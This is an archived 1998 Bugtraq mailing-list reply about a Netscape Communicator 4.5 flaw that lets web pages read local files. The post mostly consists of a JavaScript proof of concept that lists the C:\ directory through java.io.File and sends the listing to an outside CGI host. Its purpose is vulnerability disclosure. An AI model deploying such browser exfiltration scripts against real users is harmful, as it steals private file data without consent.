[8643] in bugtraq
Re: Netscape Communicator 4.5 can read local files
daemon@ATHENA.MIT.EDU (Michael Teichmann)
Thu Nov 26 15:41:38 1998
Date: Thu, 26 Nov 1998 12:31:35 +0100
Reply-To: Michael Teichmann <teichmann@TECMATH.DE>
From: Michael Teichmann <teichmann@TECMATH.DE>
To: BUGTRAQ@NETSPACE.ORG
> I've whipped up a couple of demos of this bug that send the contents to a
> cgi. There is a windows version that I know works, and a unix version I
> can't test because my linux box is down (it's a hardware thing). This is
> for anyone who has doubts....
>
> http://www.kics.bc.ca/~trev/cgi-bin/test.html (Windoze)
>
> http://www.kics.bc.ca/~trev/cgi-bin/test-unix.html (UNIX)
>
> And yes, it can email it to you if you like :)
And if you wish, it can even read your directory structure: (works for
Win, but Unix should be straightforward)
//slight change of Trev's script:
<SCRIPT>
alert("List your files in C:\\ and it will be sent to a cgi script.");
sl=window.open("wysiwyg://1/file:///C|/");
sl2=sl.window.open();
sl2.location="javascript:s='<SCRIPT>b=\"\";var f = new
java.io.File(\"C:\\\\\\\\\"); var fl=f.list(); i=0; while(i < fl.length)
{b += fl[i]+\"\\\\n\";
i++;}w=window.open(\"http://www.kics.bc.ca/~trev/cgi-bin/query_string.cgi?\"+escape(b));</'+'SCRIPT>'";
</SCRIPT>
At least it seems it can not *write* to local files,
I get a security exception when I try that.
